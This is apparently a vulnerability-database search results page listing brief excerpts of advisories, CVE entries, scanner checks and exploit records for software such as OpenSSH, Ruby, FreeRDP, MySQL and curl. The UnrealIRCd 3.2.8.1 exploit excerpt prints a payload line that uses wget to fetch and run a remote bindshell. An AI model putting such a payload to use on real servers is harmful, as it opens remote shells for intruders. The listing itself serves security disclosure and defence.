Lucene search
+L

39 matches found

Tenable Nessus
Tenable Nessus
added 2021/12/02 12:0 a.m.40 views

openSUSE 15 Security Update : ruby2.5 (openSUSE-SU-2021:3838-1)

The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:3838-1 advisory. - In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in...

7.4CVSS7.6AI score0.0305EPSS
Exploits2References10
NVD
NVD
added 2021/10/07 8:15 p.m.26 views

CVE-2021-42093

An issue was discovered in Zammad before 4.1.1. An admin can execute code on the server via a crafted request that manipulates triggers...

7.2CVSS0.01257EPSS
Exploits0References1
Cvelist
Cvelist
added 2020/05/29 12:0 a.m.25 views

CVE-2020-11038 Integer Overflow to Buffer Overflow in FreeRDP

In FreeRDP less than or equal to 2.0.0, an Integer Overflow to Buffer Overflow exists. When using /video redirection, a manipulated server can instruct the client to allocate a buffer with a smaller size than requested due to an integer overflow in size calculation. With later messages, the serve...

6.9CVSS7.5AI score0.01349EPSS
Exploits0References3
Cvelist
Cvelist
added 2020/02/10 6:3 p.m.21 views

CVE-2019-19668

A CSRF vulnerability exists in the File Types component of Web File Manager in Rumpus FTP 8.2.9.1 that allows an attacker to add or delete the file types that are used on the server via RAPR/TriggerServerFunction.html...

4.6AI score0.00379EPSS
Exploits0References2
OpenVAS
OpenVAS
added 2020/01/23 12:0 a.m.29 views

Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2019-1426)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2020 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

6.8CVSS6.7AI score0.98631EPSS
Exploits32References2
OSV
OSV
added 2019/01/31 6:29 p.m.42 views

CVE-2019-6109

An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server or Man-in-The-Middle attacker can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This...

6.8CVSS1.8AI score
Exploits0References13
exploitpack
exploitpack
added 2017/11/07 12:0 a.m.52 views

Ametys CMS 4.0.2 - Password Reset

Ametys CMS 4.0.2 - Password Reset Vulnerability Summary The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2 Ametys is “a free and open source content management system CMS written in Java. It is based on JSR-170 for content storage, Open Social for...

5CVSS9.7AI score0.07663EPSS
Exploits3
Hacker One
Hacker One
added 2017/08/06 8:15 a.m.32 views

Khan Academy: Weak Bithdate Validation Implemented on Sign Up

The Birthdate Field on the KhanAcademy's Sign Up page for new users has the year range from 2017 to 1897. F210177 However, while signing up for a new account, I was able to set the year to 1033 by manipulating the data being sent to the server and the account was successfully created. I can also...

1.6AI score
Exploits0
BDU FSTEC
BDU FSTEC
added 2016/09/19 12:0 a.m.5 views

The vulnerability of Google Chrome browser allows a perpetrator to exploit it to access user accounts.

The vulnerability of the net/proxy/proxyservice.cc file for Google Chrome Proxy Auto-Config PAC extensions does not guarantee that the information is limited to a script, host, and port. Exploiting this vulnerability could allow a malicious actor to access user accounts by manipulating the server...

4.3CVSS7.7AI score0.0152EPSS
Exploits0References4Affected Software1
BDU FSTEC
BDU FSTEC
added 2016/05/05 12:0 a.m.14 views

The vulnerability of the MySQL database management system allows attackers to compromise the confidentiality of information.

The vulnerability of the MySQL database management system is related to errors in the code. Exploiting this vulnerability allows a malicious actor to influence the confidentiality of information by manipulating the JSON server...

3.5CVSS6.6AI score0.00967EPSS
Exploits0References2Affected Software1
Amazon
Amazon
added 2015/06/18 12:0 a.m.49 views

Medium: curl

Issue Overview: As discussed upstream http://curl.haxx.se/docs/adv20150617A.html, libcurl can wrongly send HTTP credentials when re-using connections. CVE-2015-3236 Also discussed upstream http://curl.haxx.se/docs/adv20150617B.html, libcurl can get tricked by a malicious SMB server to send off da...

6.4CVSS8.9AI score0.09334EPSS
Exploits0
Check Point Advisories
Check Point Advisories
added 2014/11/17 12:0 a.m.1 views

Web Servers File Download Manipulation

An attacker can manipulate a web server to download and execute code stored on a third party server...

4.9AI score
Exploits0
The Hacker News
The Hacker News
added 2014/01/15 8:16 p.m.20 views

Exclusive: More than 200,000 Algerian TP-LINK Routers are vulnerable to Hackers

More than 15.2% of the Algerian population use Internet service which is provided by around 30 Internet Service Providers and one of the largest shares is served by Algerie Telecom. Algerie Telecom provides TP-LINK TD-W8951ND Router to most of their home customers who Opt-In for Internet services...

7.2AI score
Exploits0
exploitpack
exploitpack
added 2013/06/05 12:0 a.m.17 views

Ruubikcms 1.1.1 - tinybrowser.php?folder Directory Traversal

Ruubikcms 1.1.1 - tinybrowser.php?folder Directory Traversal Exploit Title: ruubikcms v1.1.1 Path Traversal vulnerability Google Dork: powered by ruubikcms Date: 2013-6-5 Exploit Author: expl0i13r Vendor Homepage: http://www.ruubikcms.com/ Software Link:...

0.1AI score
Exploits0
Positive Technologies
Positive Technologies
added 2012/04/06 12:0 a.m.4 views

PT-2012-3445 · Mysql Server +3 · Mysql Server +3

Name of the Vulnerable Software and Affected Versions: MySQL Server versions 5.1.61 and earlier MySQL Server versions 5.5.21 and earlier Description: The issue affects the availability of the system, related to Server DML, and can be exploited by remote authenticated users. Recommendations: For...

9CVSS7.5AI score0.96188EPSS
Exploits11References60
Exploit DB
Exploit DB
added 2010/06/13 12:0 a.m.107 views

UnrealIRCd 3.2.8.1 - Remote Downloader/Execute

!/usr/bin/perl Unreal3.2.8.1 Remote Downloader/Execute Trojan DO NOT DISTRIBUTE -PRIVATE- -iHaq 2l8 use Socket; use IO::Socket; Payload options my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &'; my...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2010/02/09 12:0 a.m.50 views

LDAP - Injection

Vurnerebility: LDAP Injection + Category : Implemented Web exploit + Category : Attack Technique + Author : mc2s3lector + dork : X/o" + Contact : www.yogyacarderlink.web.id + date : 4-2-10 + biGthank to : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all.indonesian like a coding,...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2005/12/26 12:0 a.m.35 views

hcXSS.txt

In GOD We Trust Kachal667 Under9round Team KuT Hi, Here's myLrK new advisory about Hosting Controller. Hosting Controller - CSS vulnerabilities Found date : Pri8 Public Date: 02/11/2005 Summary ------- Hosting Controller is an all-in-one administrative hosting tool for Windows. It automates a wid...

7.4AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2003/06/10 12:0 a.m.47 views

OpenSSH < 3.6.2 Reverse DNS Lookup Bypass

According to its banner, the remote host appears to be running OpenSSH-portable version 3.6.1 or older. There is a flaw in such version that could allow an attacker to bypass the access controls set by the administrator of this server. OpenSSH features a mechanism that can restrict the list of...

7.5CVSS7.6AI score0.05766EPSS
Exploits1References1
Rows per page
Query Builder